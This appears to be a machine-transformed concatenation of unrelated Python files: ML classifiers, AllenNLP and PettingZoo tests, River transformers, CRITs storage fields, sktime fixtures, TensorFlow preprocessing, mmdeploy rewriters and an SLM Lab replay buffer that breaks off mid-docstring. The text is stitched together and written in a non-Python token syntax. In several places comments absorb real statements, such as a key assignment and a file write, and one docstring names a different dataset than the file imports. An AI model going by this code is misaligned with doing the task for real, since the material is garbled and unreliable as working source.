"""<if_stmt>do_one_hot<block_start>self.enc=OneHotEncoder(dtype=np.float32)<line_sep>x=self.enc.fit_transform(x)<block_end><else_stmt><block_start>self.enc=<none><line_sep>x=np.array(x np.float32)<block_end>n=x.shape[0]<line_sep>y=np.array(y np.int8)<line_sep>self.class_log_prior=np.log(np.bincount(y)/n)<line_sep>masks=[y<eq>i<for>i range(len(self.class_log_prior))]<line_sep>masked_xs=[x[mask]<for>mask masks]<line_sep>feature_counts=np.array([np.asarray(masked_x.sum(0))[0]<for>masked_x masked_xs])<line_sep>smoothed_fc=feature_counts+self.alpha<line_sep>self.feature_log_prob=np.log(smoothed_fc/smoothed_fc.sum(1 keepdims=<true>))<line_sep><return>self<block_end><def_stmt>_predict self x<block_start>""" Internal method for calculating (linear) predictions Parameters ---------- x : {np.ndarray of float, scipy.sparse.csr.csr_matrix of float} One-Hot encoded feature vectors Returns ------- predictions : np.ndarray of float Returns (linear) predictions. """<line_sep><return>x.dot(self.feature_log_prob.T)+self.class_log_prior<block_end><def_stmt>predict self x<block_start>""" API for calculating (linear) predictions Parameters ---------- x : {list of float, np.ndarray of float} Target feature vectors Returns ------- predictions : np.ndarray of float Returns (linear) predictions. """<if_stmt>self.enc<is><not><none><block_start>x=self.enc.transform(x)<block_end><return>self._predict(x)<block_end><def_stmt>predict_class self x<block_start>""" API for predicting labels Parameters ---------- x : {list of float, np.ndarray of float} Target feature vectors Returns ------- labels : np.ndarray of int Returns labels. """<line_sep><return>np.argmax(self.predict(x) 1)<block_end><block_end>
<import_from_stmt>allennlp.common Params<import_from_stmt>allennlp.data Instance Token Batch<import_from_stmt>allennlp.data.fields TextField<import_from_stmt>allennlp.data.samplers BucketBatchSampler<import_from_stmt>allennlp.data.data_loaders MultiProcessDataLoader<import_from_stmt>.sampler_test SamplerTest<class_stmt>TestBucketSampler(SamplerTest)<block_start><def_stmt>test_create_batches_groups_correctly self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0 sorting_keys=["text"])<line_sep>grouped_instances=[]<for_stmt>indices sampler.get_batch_indices(self.instances)<block_start>grouped_instances.append([self.instances[idx]<for>idx indices])<block_end>expected_groups=[[self.instances[4] self.instances[2]] [self.instances[0] self.instances[1]] [self.instances[3]] ]<for_stmt>group grouped_instances<block_start><assert_stmt>group<in>expected_groups<line_sep>expected_groups.remove(group)<block_end><assert_stmt>expected_groups<eq>[]<block_end><def_stmt>test_disable_shuffle self<block_start>sampler=BucketBatchSampler(batch_size=2 sorting_keys=["text"] shuffle=<false>)<line_sep>grouped_instances=[]<for_stmt>indices sampler.get_batch_indices(self.instances)<block_start>grouped_instances.append([self.instances[idx]<for>idx indices])<block_end>expected_groups=[[self.instances[4] self.instances[2]] [self.instances[0] self.instances[1]] [self.instances[3]] ]<for_stmt>idx,group enumerate(grouped_instances)<block_start><assert_stmt>group<eq>expected_groups[idx]<block_end><block_end><def_stmt>test_guess_sorting_key_picks_the_longest_key self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0)<line_sep>instances=[]<line_sep>short_tokens=[Token(t)<for>t ["what" "is" "this" "?"]]<line_sep>long_tokens=[Token(t)<for>t ["this" "is" "a" "not" "very" "long" "passage"]]<line_sep>instances.append(Instance({"question":TextField(short_tokens self.token_indexers) "passage":TextField(long_tokens self.token_indexers) }))<line_sep>instances.append(Instance({"question":TextField(short_tokens self.token_indexers) "passage":TextField(long_tokens self.token_indexers) }))<line_sep>instances.append(Instance({"question":TextField(short_tokens self.token_indexers) "passage":TextField(long_tokens self.token_indexers) }))<assert_stmt>sampler.sorting_keys<is><none><line_sep>sampler._guess_sorting_keys(instances)<assert_stmt>sampler.sorting_keys<eq>["passage"]<block_end><def_stmt>test_from_params self<block_start>params=Params({})<line_sep>sorting_keys=["s1" "s2"]<line_sep>params["sorting_keys"]=sorting_keys<line_sep>params["batch_size"]=32<line_sep>sampler=BucketBatchSampler.from_params(params=params)<assert_stmt>sampler.sorting_keys<eq>sorting_keys<assert_stmt>sampler.padding_noise<eq>0.1<assert_stmt>sampler.batch_size<eq>32<line_sep>params=Params({"sorting_keys":sorting_keys "padding_noise":0.5 "batch_size":100 "drop_last":<true> })<line_sep>sampler=BucketBatchSampler.from_params(params=params)<assert_stmt>sampler.sorting_keys<eq>sorting_keys<assert_stmt>sampler.padding_noise<eq>0.5<assert_stmt>sampler.batch_size<eq>100<assert_stmt>sampler.drop_last<block_end><def_stmt>test_drop_last_works self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0 sorting_keys=["text"] drop_last=<true> )<line_sep># We use a custom collate_fn for testing, which doesn't actually create tensors, # just the allennlp Batches. 
<def_stmt>collate_fn x **kwargs<block_start><return>Batch(x)<block_end>data_loader=MultiProcessDataLoader(self.get_mock_reader() "fake_path" batch_sampler=sampler )<line_sep>data_loader.collate_fn=collate_fn<line_sep>data_loader.index_with(self.vocab)<line_sep>batches=[batch<for>batch iter(data_loader)]<line_sep>stats=self.get_batches_stats(batches)<line_sep># all batches have length batch_size <assert_stmt>all(batch_len<eq>2<for>batch_len stats["batch_lengths"])<line_sep># we should have lost one instance by skipping the last batch <assert_stmt>stats["total_instances"]<eq>len(self.instances)-1<block_end><def_stmt>test_batch_count self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0 sorting_keys=["text"])<line_sep>data_loader=MultiProcessDataLoader(self.get_mock_reader() "fake_path" batch_sampler=sampler)<line_sep>data_loader.index_with(self.vocab)<assert_stmt>len(data_loader)<eq>3<block_end><def_stmt>test_batch_count_with_drop_last self<block_start>sampler=BucketBatchSampler(batch_size=2 padding_noise=0 sorting_keys=["text"] drop_last=<true> )<line_sep>data_loader=MultiProcessDataLoader(self.get_mock_reader() "fake_path" batch_sampler=sampler)<assert_stmt>len(data_loader)<eq>2<block_end><block_end>
<import_from_stmt>typing Dict<import_from_stmt>river base<line_sep>__all__=["Renamer" "Prefixer" "Suffixer"]<class_stmt>Renamer(base.Transformer)<block_start>"""Renames features following substitution rules. Parameters ---------- mapping Dictionary describing substitution rules. Keys in `mapping` that are not a feature's name are silently ignored. Examples -------- >>> from river import compose >>> mapping = {'a': 'v', 'c': 'o'} >>> x = {'a': 42, 'b': 12} >>> compose.Renamer(mapping).transform_one(x) {'b': 12, 'v': 42} """<def_stmt>__init__ self mapping:Dict[str str]<block_start>self.mapping=mapping<block_end><def_stmt>transform_one self x<block_start><for_stmt>old_key,new_key self.mapping.items()<block_start><try_stmt><block_start>x[new_key]=x.pop(old_key)<block_end><except_stmt>KeyError<block_start><pass><block_end><block_end># Ignoring keys that are not a feature's name <return>x<block_end><block_end><class_stmt>Prefixer(base.Transformer)<block_start>"""Prepends a prefix to feature names. Parameters ---------- prefix Examples -------- >>> from river import compose >>> x = {'a': 42, 'b': 12} >>> compose.Prefixer('prefix_').transform_one(x) {'prefix_a': 42, 'prefix_b': 12} """<def_stmt>__init__ self prefix:str<block_start>self.prefix=prefix<block_end><def_stmt>_rename self s:str<arrow>str<block_start><return>f"{self.prefix}{s}"<block_end><def_stmt>transform_one self x<block_start><return>{self._rename(i):xi<for>i,xi x.items()}<block_end><block_end><class_stmt>Suffixer(base.Transformer)<block_start>"""Appends a suffix to feature names. Parameters ---------- suffix Examples -------- >>> from river import compose >>> x = {'a': 42, 'b': 12} >>> compose.Suffixer('_suffix').transform_one(x) {'a_suffix': 42, 'b_suffix': 12} """<def_stmt>__init__ self suffix:str<block_start>self.suffix=suffix<block_end><def_stmt>_rename self s:str<arrow>str<block_start><return>f"{s}{self.suffix}"<block_end><def_stmt>transform_one self x<block_start><return>{self._rename(i):xi<for>i,xi x.items()}<block_end><block_end>
<import_stmt>datetime<import_from_stmt>dateutil.parser parse<import_from_stmt>mongoengine DateTimeField FileField<import_from_stmt>mongoengine.connection DEFAULT_CONNECTION_NAME<line_sep>#from mongoengine.python_support import str_types <import_from_stmt>six string_types<as>str_types<import_stmt>io<import_from_stmt>django.conf settings<if_stmt>settings.FILE_DB<eq>settings.S3<block_start><import_stmt>crits.core.s3_tools<as>S3<block_end><class_stmt>CritsDateTimeField(DateTimeField)<block_start>""" Custom MongoEngine DateTimeField. Utilizes a transform such that if the value passed in is a string we will convert it to a datetime.datetime object, or if it is set to None we will use the current datetime (useful when instantiating new objects and wanting the default dates to all be the current datetime). """<def_stmt>__set__ self instance value<block_start>value=self.transform(value)<line_sep><return>super(CritsDateTimeField self).__set__(instance value)<block_end><def_stmt>transform self value<block_start><if_stmt>value<and>isinstance(value str_types)<block_start><return>parse(value fuzzy=<true>)<block_end><elif_stmt><not>value<block_start><return>datetime.datetime.now()<block_end><else_stmt><block_start><return>value<block_end><block_end><block_end><class_stmt>S3Proxy(object)<block_start>""" Custom proxy for MongoEngine which uses S3 to store binaries instead of GridFS. """<def_stmt>__init__ self grid_id=<none> key=<none> instance=<none> db_alias=DEFAULT_CONNECTION_NAME collection_name='fs'<block_start>self.grid_id=grid_id# Store id for file self.key=key<line_sep>self.instance=instance<line_sep>self.db_alias=db_alias<line_sep>self.collection_name=collection_name<line_sep>self.newfile=<none># Used for partial writes self.gridout=<none><block_end><def_stmt>__getattr__ self name<block_start>attrs=('_fs' 'grid_id' 'key' 'instance' 'db_alias' 'collection_name' 'newfile' 'gridout')<if_stmt>name<in>attrs<block_start><return>self.__getattribute__(name)<block_end>obj=self.get()<if_stmt>name<in>dir(obj)<block_start><return>getattr(obj name)<block_end><raise>AttributeError<block_end><def_stmt>__get__ self instance value<block_start><return>self<block_end><def_stmt>__repr__ self<block_start><return>'<%s: %s>'%(self.__class__.__name__ self.grid_id)<block_end><def_stmt>delete self# Delete file from S3, FileField still remains <block_start>S3.delete_file_s3(self.grid_id self.collection_name)<line_sep>self.grid_id=<none><line_sep>self.gridout=<none><line_sep>self._mark_as_changed()<block_end><def_stmt>get self id=<none><block_start><if_stmt>id<block_start>self.grid_id=id<block_end><if_stmt>self.grid_id<is><none><block_start><return><none><block_end><try_stmt><block_start><if_stmt>self.gridout<is><none><block_start>self.gridout=io.BytesIO(S3.get_file_s3(self.grid_id self.collection_name))<block_end><return>self.gridout<block_end><except_stmt><block_start><return><none><block_end><block_end><def_stmt>put self file_obj **kwargs<block_start><if_stmt>self.grid_id<block_start><raise>Exception('This document already has a file. 
Either delete '<concat>'it or call replace to overwrite it')<block_end>self.grid_id=S3.put_file_s3(file_obj self.collection_name)<line_sep>self._mark_as_changed()<block_end><def_stmt>read self size=-1<block_start>gridout=self.get()<if_stmt>gridout<is><none><block_start><return><none><block_end><else_stmt><block_start><try_stmt><block_start><return>gridout.read(size)<block_end><except_stmt><block_start><return>""<block_end><block_end><block_end><def_stmt>_mark_as_changed self<block_start>"""Inform the instance that `self.key` has been changed"""<if_stmt>self.instance<block_start>self.instance._mark_as_changed(self.key)<block_end><block_end><block_end><class_stmt>S3FileField(FileField)<block_start>""" Custom FileField for MongoEngine which utilizes S3. """<def_stmt>__init__ self db_alias=DEFAULT_CONNECTION_NAME collection_name="fs" **kwargs<block_start>super(S3FileField self).__init__(db_alias collection_name **kwargs)<line_sep>self.proxy_class=S3Proxy<block_end><def_stmt>__set__ self instance value<block_start>key=self.name<if_stmt>((hasattr(value 'read')<and><not>isinstance(value self.proxy_class))<or>isinstance(value str_types))# using "FileField() = file/string" notation <block_start>grid_file=instance._data.get(self.name)<line_sep># If a file already exists, delete it <if_stmt>grid_file<block_start><try_stmt><block_start>grid_file.delete()<block_end><except_stmt><block_start><pass><block_end># Create a new file with the new data grid_file.put(value)<block_end><else_stmt># Create a new proxy object as we don't already have one <block_start>instance._data[key]=self.proxy_class(key=key instance=instance collection_name=self.collection_name)<line_sep>instance._data[key].put(value)<block_end><block_end><else_stmt><block_start>instance._data[key]=value<block_end>instance._mark_as_changed(key)<block_end><block_end><def_stmt>getFileField db_alias=DEFAULT_CONNECTION_NAME collection_name="fs" **kwargs<block_start>""" Determine if the admin has configured CRITs to utilize GridFS or S3 for binary storage. """<if_stmt>settings.FILE_DB<eq>settings.GRIDFS<block_start><return>FileField(db_alias collection_name **kwargs)<block_end><elif_stmt>settings.FILE_DB<eq>settings.S3<block_start><return>S3FileField(db_alias collection_name **kwargs)<block_end><block_end>
# -*- coding: utf-8 -*- """Example generation for testing. Exports dict of examples, useful for testing as fixtures. example_dict: dict indexed by triple 1st element = mtype - str 2nd element = considered as this scitype - str 3rd element = int - index of example elements are data objects, considered examples for the mtype all examples with same index are considered "same" on scitype content if None, indicates that representation is not possible example_lossy: dict of bool indexed by pairs of str 1st element = mtype - str 2nd element = considered as this scitype - str 3rd element = int - index of example elements are bool, indicate whether representation has information removed all examples with same index are considered "same" on scitype content overall, conversions from non-lossy representations to any other ones should yield the element exactly, identically (given same index) """<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<line_sep>example_dict=dict()<line_sep>example_dict_lossy=dict()<line_sep>### X=np.array([[[1 2 3] [4 5 6]] [[1 2 3] [4 55 6]] [[1 2 3] [42 5 6]]] dtype=np.int64 )<line_sep>example_dict[("numpy3D" "Panel" 0)]=X<line_sep>example_dict_lossy[("numpy3D" "Panel" 0)]=<false><line_sep>cols=[f"var_{i}"<for>i range(2)]<line_sep>Xlist=[pd.DataFrame([[1 4] [2 5] [3 6]] columns=cols) pd.DataFrame([[1 4] [2 55] [3 6]] columns=cols) pd.DataFrame([[1 42] [2 5] [3 6]] columns=cols) ]<line_sep>example_dict[("df-list" "Panel" 0)]=Xlist<line_sep>example_dict_lossy[("df-list" "Panel" 0)]=<false><line_sep>cols=["instances" "timepoints"]+[f"var_{i}"<for>i range(2)]<line_sep>Xlist=[pd.DataFrame([[0 0 1 4] [0 1 2 5] [0 2 3 6]] columns=cols) pd.DataFrame([[1 0 1 4] [1 1 2 55] [1 2 3 6]] columns=cols) pd.DataFrame([[2 0 1 42] [2 1 2 5] [2 2 3 6]] columns=cols) ]<line_sep>X=pd.concat(Xlist)<line_sep>X=X.set_index(["instances" "timepoints"])<line_sep>example_dict[("pd-multiindex" "Panel" 0)]=X<line_sep>example_dict_lossy[("pd-multiindex" "Panel" 0)]=<false><line_sep>cols=[f"var_{i}"<for>i range(2)]<line_sep>X=pd.DataFrame(columns=cols index=[0 1 2])<line_sep>X["var_0"]=pd.Series([pd.Series([1 2 3]) pd.Series([1 2 3]) pd.Series([1 2 3])])<line_sep>X["var_1"]=pd.Series([pd.Series([4 5 6]) pd.Series([4 55 6]) pd.Series([42 5 6])])<line_sep>example_dict[("nested_univ" "Panel" 0)]=X<line_sep>example_dict_lossy[("nested_univ" "Panel" 0)]=<false><line_sep>
<import_stmt>numpy<as>np<def_stmt>max_cycles_test mod<block_start>max_cycles=4<line_sep>parallel_env=mod.parallel_env(max_cycles=max_cycles)<line_sep>observations=parallel_env.reset()<line_sep>dones={agent:<false><for>agent parallel_env.agents}<line_sep>test_cycles=max_cycles+10# allows environment to do more than max_cycles if it so wishes <for_stmt>step range(test_cycles)<block_start>actions={agent:parallel_env.action_space(agent).sample()<for>agent parallel_env.agents<if><not>dones[agent]}<line_sep>observations,rewards,dones,infos=parallel_env.step(actions)<if_stmt>all(dones.values())<block_start><break><block_end><block_end>pstep=step+1<line_sep>env=mod.env(max_cycles=max_cycles)<line_sep>env.reset()<line_sep>agent_counts=np.zeros(len(env.possible_agents))<for_stmt>a env.agent_iter()# counts agent index <block_start>aidx=env.possible_agents.index(a)<line_sep>agent_counts[aidx]<augadd>1<line_sep>action=env.action_space(a).sample()<if><not>env.dones[a]<else><none><line_sep>env.step(action)<block_end><assert_stmt>max_cycles<eq>pstep<line_sep># does not check the minimum value because some agents might be killed before # all the steps are complete. However, most agents should still be alive # given a short number of cycles <assert_stmt>max_cycles<eq>np.max(agent_counts)-1<assert_stmt>max_cycles<eq>np.median(agent_counts)-1<block_end>
# Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_stmt>argparse<import_stmt>collections<import_stmt>json<import_stmt>os<import_stmt>six<import_stmt>sys<import_from_stmt>tensorflow.python.lib.io file_io<line_sep>SCHEMA_FILE='schema.json'<line_sep>NUMERICAL_ANALYSIS_FILE='stats.json'<line_sep>CATEGORICAL_ANALYSIS_FILE='vocab_%s.csv'<def_stmt>parse_arguments argv<block_start>"""Parse command line arguments. Args: argv: list of command line arguments, including program name. Returns: An argparse Namespace object. """<line_sep>parser=argparse.ArgumentParser(description='Runs Preprocessing on structured CSV data.')<line_sep>parser.add_argument('--input-file-pattern' type=str required=<true> help='Input CSV file names. May contain a file pattern')<line_sep>parser.add_argument('--output-dir' type=str required=<true> help='Google Cloud Storage location in which to place outputs.')<line_sep>parser.add_argument('--schema-file' type=str required=<true> help=('BigQuery json schema file'))<line_sep>args=parser.parse_args(args=argv[1:])<line_sep># Make sure the output folder exists if local folder. file_io.recursive_create_dir(args.output_dir)<line_sep><return>args<block_end><def_stmt>run_numerical_categorical_analysis args schema_list<block_start>"""Makes the numerical and categorical analysis files. Args: args: the command line args schema_list: python object of the schema json file. Raises: ValueError: if schema contains unknown column types. """<line_sep>header=[column['name']<for>column schema_list]<line_sep>input_files=file_io.get_matching_files(args.input_file_pattern)<line_sep># Check the schema is valid <for_stmt>col_schema schema_list<block_start>col_type=col_schema['type'].lower()<if_stmt>col_type<ne>'string'<and>col_type<ne>'integer'<and>col_type<ne>'float'<block_start><raise>ValueError('Schema contains an unsupported type %s.'%col_type)<block_end><block_end># initialize the results <def_stmt>_init_numerical_results <block_start><return>{'min':float('inf') 'max':float('-inf') 'count':0 'sum':0.0}<block_end>numerical_results=collections.defaultdict(_init_numerical_results)<line_sep>categorical_results=collections.defaultdict(set)<line_sep># for each file, update the numerical stats from that file, and update the set # of unique labels. <for_stmt>input_file input_files<block_start><with_stmt>file_io.FileIO(input_file 'r')<as>f<block_start><for_stmt>line f<block_start>parsed_line=dict(zip(header line.strip().split(',')))<for_stmt>col_schema schema_list<block_start>col_name=col_schema['name']<line_sep>col_type=col_schema['type']<if_stmt>col_type.lower()<eq>'string'<block_start>categorical_results[col_name].update([parsed_line[col_name]])<block_end><else_stmt># numerical column. 
# if empty, skip <block_start><if_stmt><not>parsed_line[col_name].strip()<block_start><continue><block_end>numerical_results[col_name]['min']=(min(numerical_results[col_name]['min'] float(parsed_line[col_name])))<line_sep>numerical_results[col_name]['max']=(max(numerical_results[col_name]['max'] float(parsed_line[col_name])))<line_sep>numerical_results[col_name]['count']<augadd>1<line_sep>numerical_results[col_name]['sum']<augadd>float(parsed_line[col_name])<block_end><block_end><block_end><block_end><block_end># Update numerical_results to just have min/min/mean <for_stmt>col_schema schema_list<block_start><if_stmt>col_schema['type'].lower()<ne>'string'<block_start>col_name=col_schema['name']<line_sep>mean=numerical_results[col_name]['sum']/numerical_results[col_name]['count']<del_stmt>numerical_results[col_name]['sum']<del_stmt>numerical_results[col_name]['count']<line_sep>numerical_results[col_name]['mean']=mean<block_end><block_end># Write the numerical_results to a json file. file_io.write_string_to_file(os.path.join(args.output_dir NUMERICAL_ANALYSIS_FILE) json.dumps(numerical_results indent=2 separators=(',' ': ')))<line_sep># Write the vocab files. Each label is on its own line. <for_stmt>name,unique_labels six.iteritems(categorical_results)<block_start>labels='\n'.join(list(unique_labels))<line_sep>file_io.write_string_to_file(os.path.join(args.output_dir CATEGORICAL_ANALYSIS_FILE%name) labels)<block_end><block_end><def_stmt>run_analysis args<block_start>"""Builds an analysis files for training."""<line_sep># Read the schema and input feature types schema_list=json.loads(file_io.read_file_to_string(args.schema_file))<line_sep>run_numerical_categorical_analysis(args schema_list)<line_sep># Also save a copy of the schema in the output folder. file_io.copy(args.schema_file os.path.join(args.output_dir SCHEMA_FILE) overwrite=<true>)<block_end><def_stmt>main argv=<none><block_start>args=parse_arguments(sys.argv<if>argv<is><none><else>argv)<line_sep>run_analysis(args)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
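# Hypothetical programmatic invocation of the analysis above (the file paths are
# placeholders; the three flags are exactly the ones declared in parse_arguments).
# It writes stats.json, one vocab_<column>.csv per string column, and a copy of the
# schema file into --output-dir.
argv = ['analyze.py',
        '--input-file-pattern', 'gs://my-bucket/data/train-*.csv',
        '--output-dir', 'gs://my-bucket/analysis',
        '--schema-file', 'schema.json']
run_analysis(parse_arguments(argv))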
"""MNE visual_92_categories dataset."""<import_from_stmt>.kiloword data_path get_version<line_sep>
# Copyright (c) OpenMMLab. All rights reserved. <import_stmt>torch<import_from_stmt>mmdeploy.core FUNCTION_REWRITER<line_sep>@FUNCTION_REWRITER.register_rewriter('mmdet.models.roi_heads.test_mixins.BBoxTestMixin.simple_test_bboxes')<def_stmt>bbox_test_mixin__simple_test_bboxes ctx self x img_metas proposals rcnn_test_cfg rescale=<false><block_start>"""Rewrite `simple_test_bboxes` of `BBoxTestMixin` for default backend. 1. This function eliminates the batch dimension to get forward bbox results, and recover batch dimension to calculate final result for deployment. 2. This function returns detection result as Tensor instead of numpy array. Args: ctx (ContextCaller): The context with additional information. self: The instance of the original class. x (tuple[Tensor]): Features from upstream network. Each has shape (batch_size, c, h, w). img_metas (list[dict]): Meta information of images. proposals (list(Tensor)): Proposals from rpn head. Each has shape (num_proposals, 5), last dimension 5 represent (x1, y1, x2, y2, score). rcnn_test_cfg (obj:`ConfigDict`): `test_cfg` of R-CNN. rescale (bool): If True, return boxes in original image space. Default: False. Returns: tuple[Tensor, Tensor]: (det_bboxes, det_labels), `det_bboxes` of shape [N, num_det, 5] and `det_labels` of shape [N, num_det]. """<line_sep>rois=proposals<line_sep>batch_index=torch.arange(rois.shape[0] device=rois.device).float().view(-1 1 1).expand(rois.size(0) rois.size(1) 1)<line_sep>rois=torch.cat([batch_index rois[<ellipsis> :4]] dim=-1)<line_sep>batch_size=rois.shape[0]<line_sep>num_proposals_per_img=rois.shape[1]<line_sep># Eliminate the batch dimension rois=rois.view(-1 5)<line_sep>bbox_results=self._bbox_forward(x rois)<line_sep>cls_score=bbox_results['cls_score']<line_sep>bbox_pred=bbox_results['bbox_pred']<line_sep># Recover the batch dimension rois=rois.reshape(batch_size num_proposals_per_img rois.size(-1))<line_sep>cls_score=cls_score.reshape(batch_size num_proposals_per_img cls_score.size(-1))<line_sep>bbox_pred=bbox_pred.reshape(batch_size num_proposals_per_img bbox_pred.size(-1))<line_sep>det_bboxes,det_labels=self.bbox_head.get_bboxes(rois cls_score bbox_pred img_metas[0]['img_shape'] <none> rescale=rescale cfg=rcnn_test_cfg)<line_sep><return>det_bboxes det_labels<block_end>@FUNCTION_REWRITER.register_rewriter('mmdet.models.roi_heads.test_mixins.MaskTestMixin.simple_test_mask')<def_stmt>mask_test_mixin__simple_test_mask ctx self x img_metas det_bboxes det_labels **kwargs<block_start>"""Rewrite `simple_test_mask` of `BBoxTestMixin` for default backend. This function returns detection result as Tensor instead of numpy array. Args: ctx (ContextCaller): The context with additional information. self: The instance of the original class. x (tuple[Tensor]): Features from upstream network. Each has shape (batch_size, c, h, w). img_metas (list[dict]): Meta information of images. det_bboxes (tuple[Tensor]): Detection bounding-boxes from features. Each has shape of (batch_size, num_det, 5). det_labels (tuple[Tensor]): Detection labels from features. Each has shape of (batch_size, num_det). Returns: tuple[Tensor]: (segm_results), `segm_results` of shape [N, num_det, roi_H, roi_W]. 
"""<line_sep>batch_size=det_bboxes.size(0)<line_sep>det_bboxes=det_bboxes[<ellipsis> :4]<line_sep>batch_index=torch.arange(det_bboxes.size(0) device=det_bboxes.device).float().view(-1 1 1).expand(det_bboxes.size(0) det_bboxes.size(1) 1)<line_sep>mask_rois=torch.cat([batch_index det_bboxes] dim=-1)<line_sep>mask_rois=mask_rois.view(-1 5)<line_sep>mask_results=self._mask_forward(x mask_rois)<line_sep>mask_pred=mask_results['mask_pred']<line_sep>max_shape=img_metas[0]['img_shape']<line_sep>num_det=det_bboxes.shape[1]<line_sep>det_bboxes=det_bboxes.reshape(-1 4)<line_sep>det_labels=det_labels.reshape(-1)<line_sep>segm_results=self.mask_head.get_seg_masks(mask_pred det_bboxes det_labels self.test_cfg max_shape)<line_sep>segm_results=segm_results.reshape(batch_size num_det segm_results.shape[-2] segm_results.shape[-1])<line_sep><return>segm_results<block_end>
<import_from_stmt>collections deque<import_from_stmt>copy deepcopy<import_from_stmt>slm_lab.agent.memory.base Memory<import_from_stmt>slm_lab.lib logger math_util util<import_from_stmt>slm_lab.lib.decorator lab_api<import_stmt>numpy<as>np<import_stmt>pydash<as>ps<line_sep>logger=logger.get_logger(__name__)<def_stmt>sample_next_states head max_size ns_idx_offset batch_idxs states ns_buffer<block_start>'''Method to sample next_states from states, with proper guard for next_state idx being out of bound'''<line_sep># idxs for next state is state idxs with offset, modded ns_batch_idxs=(batch_idxs+ns_idx_offset)%max_size<line_sep># if head < ns_idx <= head + ns_idx_offset, ns is stored in ns_buffer ns_batch_idxs=ns_batch_idxs%max_size<line_sep>buffer_ns_locs=np.argwhere((head<l>ns_batch_idxs)&(ns_batch_idxs<le>head+ns_idx_offset)).flatten()<line_sep># find if there is any idxs to get from buffer to_replace=buffer_ns_locs.size<ne>0<if_stmt>to_replace# extract the buffer_idxs first for replacement later # given head < ns_idx <= head + offset, and valid buffer idx is [0, offset) # get 0 < ns_idx - head <= offset, or equiv. # get -1 < ns_idx - head - 1 <= offset - 1, i.e. # get 0 <= ns_idx - head - 1 < offset, hence: <block_start>buffer_idxs=ns_batch_idxs[buffer_ns_locs]-head-1<line_sep># set them to 0 first to allow sampling, then replace later with buffer ns_batch_idxs[buffer_ns_locs]=0<block_end># guard all against overrun idxs from offset ns_batch_idxs=ns_batch_idxs%max_size<line_sep>next_states=util.batch_get(states ns_batch_idxs)<if_stmt>to_replace# now replace using buffer_idxs and ns_buffer <block_start>buffer_ns=util.batch_get(ns_buffer buffer_idxs)<line_sep>next_states[buffer_ns_locs]=buffer_ns<block_end><return>next_states<block_end><class_stmt>Replay(Memory)<block_start>''' Stores agent experiences and samples from them for agent training An experience consists of - state: representation of a state - action: action taken - reward: scalar value - next state: representation of next state (should be same as state) - done: 0 / 1 representing if the current state is the last in an episode The memory has a size of N. When capacity is reached, the oldest experience is deleted to make space for the latest experience. - This is implemented as a circular buffer so that inserting experiences is O(1) - Each element of an experience is stored as a separate array of size N * element dim When a batch of experiences is requested, K experiences are sampled according to a random uniform distribution. If 'use_cer', sampling will add the latest experience. e.g. 
memory_spec "memory": { "name": "Replay", "batch_size": 32, "max_size": 10000, "use_cer": true } '''<def_stmt>__init__ self memory_spec body<block_start>super().__init__(memory_spec body)<line_sep>util.set_attr(self self.memory_spec ['batch_size' 'max_size' 'use_cer' ])<line_sep>self.is_episodic=<false><line_sep>self.batch_idxs=<none><line_sep>self.size=0# total experiences stored self.seen_size=0# total experiences seen cumulatively self.head=-1# index of most recent experience # generic next_state buffer to store last next_states (allow for multiple for venv) self.ns_idx_offset=self.body.env.num_envs<if>body.env.is_venv<else>1<line_sep>self.ns_buffer=deque(maxlen=self.ns_idx_offset)<line_sep># declare what data keys to store self.data_keys=['states' 'actions' 'rewards' 'next_states' 'dones']<line_sep>self.reset()<block_end><def_stmt>reset self<block_start>'''Initializes the memory arrays, size and head pointer'''<line_sep># set self.states, self.actions, ... <for_stmt>k self.data_keys<block_start><if_stmt>k<ne>'next_states'# reuse self.states # list add/sample is over 10x faster than np, also simpler to handle <block_start>setattr(self k [<none>]<times>self.max_size)<block_end><block_end>self.size=0<line_sep>self.head=-1<line_sep>self.ns_buffer.clear()<block_end>@lab_api<def_stmt>update self state action reward next_state done<block_start>'''Interface method to update memory'''<if_stmt>self.body.env.is_venv<block_start><for_stmt>sarsd zip(state action reward next_state done)<block_start>self.add_experience(*sarsd)<block_end><block_end><else_stmt><block_start>self.add_experience(state action reward next_state done)<block_end><block_end><def_stmt>add_experience self state action reward next_state done<block_start>'''Implementation for update() to add experience to memory, expanding the memory size if necessary'''<line_sep># Move head pointer. Wrap around if necessary self.head=(self.head+1)%self.max_size<line_sep>self.states[self.head]=state.astype(np.float16)<line_sep>self.actions[self.head]=action<line_sep>self.rewards[self.head]=reward<line_sep>self.ns_buffer.append(next_state.astype(np.float16))<line_sep>self.dones[self.head]=done<line_sep># Actually occupied size of memory <if_stmt>self.size<l>self.max_size<block_start>self.size<augadd>1<block_end>self.seen_size<augadd>1<line_sep># set to_train using memory counters head, seen_size instead of tick since clock will step by num_envs when on venv; to_train will be set to 0 after training step algorithm=self.body.agent.algorithm<line_sep>algorithm.to_train=algorithm.to_train<or>(self.seen_size<g>algorithm.training_start_step<and>self.head%algorithm.training_frequency<eq>0)<block_end>@lab_api<def_stmt>sample self<block_start>''' Returns a batch of batch_size samples. Batch is stored as a dict. Keys are the names of the different elements of an experience. Values are an array of the corresponding sampled elements e.g. 
